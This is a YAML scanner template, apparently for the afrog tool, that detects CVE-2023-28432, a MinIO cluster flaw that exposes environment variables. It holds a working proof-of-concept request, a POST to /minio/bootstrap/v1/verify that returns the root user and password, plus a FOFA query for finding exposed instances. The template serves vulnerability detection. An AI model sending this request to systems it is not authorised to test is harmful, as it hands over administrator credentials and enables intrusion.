id: CVE-2023-28432

info:
  name: MinIO 未授权信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |
    Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
    fofa: app="minio"
  affected: RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z
  reference:
    - https://mp.weixin.qq.com/s/JSGlEsTrahnBLIwIW-DD5Q
    - https://mp.weixin.qq.com/s/jCQC3Z9RdkHzPwsouurIGA
  tags: cve,cve2023,minio,unauthorized
  created: 2023/07/23

set:
  hostname: request.url.host
rules:
  r0:
    request:
      method: POST
      path: /minio/bootstrap/v1/verify
    expression: response.status == 200 && response.body.bcontains(b'"MINIO_ROOT_PASSWORD":') && response.body.bcontains(b'"MINIO_ROOT_USER":')
expression: r0() 
